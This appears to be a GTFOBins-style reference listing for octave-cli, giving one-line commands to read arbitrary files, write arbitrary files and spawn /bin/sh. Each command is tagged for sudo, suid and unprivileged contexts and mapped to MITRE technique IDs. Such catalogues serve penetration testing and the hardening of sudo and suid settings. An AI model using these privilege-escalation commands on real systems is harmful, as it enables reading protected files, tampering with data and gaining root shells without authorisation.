file-read File ReadPrivilege Escalation Linux octave-cli --eval 'format none; fid = fopen("/path/to/input-file"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);' copy Contextsudo Nativefile-read MITRET1005 Refsgtfobins.github.io/gtfobins/octave/
file-read File ReadPrivilege Escalation Linux octave-cli --eval 'format none; fid = fopen("/path/to/input-file"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);' copy Contextsuid Nativefile-read MITRET1005 Refsgtfobins.github.io/gtfobins/octave/
file-read File Read Linux octave-cli --eval 'format none; fid = fopen("/path/to/input-file"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);' copy Contextunprivileged Nativefile-read MITRET1005 Refsgtfobins.github.io/gtfobins/octave/
file-write File WritePrivilege Escalation Linux octave-cli --eval 'fid = fopen("/path/to/output-file", "w"); fputs(fid, "DATA"); fclose(fid);' copy Contextsudo Nativefile-write MITRET1565 Refsgtfobins.github.io/gtfobins/octave/
file-write File WritePrivilege Escalation Linux octave-cli --eval 'fid = fopen("/path/to/output-file", "w"); fputs(fid, "DATA"); fclose(fid);' copy Contextsuid Nativefile-write MITRET1565 Refsgtfobins.github.io/gtfobins/octave/
file-write File Write Linux octave-cli --eval 'fid = fopen("/path/to/output-file", "w"); fputs(fid, "DATA"); fclose(fid);' copy Contextunprivileged Nativefile-write MITRET1565 Refsgtfobins.github.io/gtfobins/octave/
shell ExecutionPrivilege Escalation Linux octave-cli --eval 'system("/bin/sh")' copy Contextsudo Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/octave/
shell ExecutionPrivilege Escalation Linux octave-cli --eval 'system("/bin/sh")' copy Contextsuid Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/octave/
shell Execution Linux octave-cli --eval 'system("/bin/sh")' copy Contextunprivileged Nativeshell MITRET1059 Refsgtfobins.github.io/gtfobins/octave/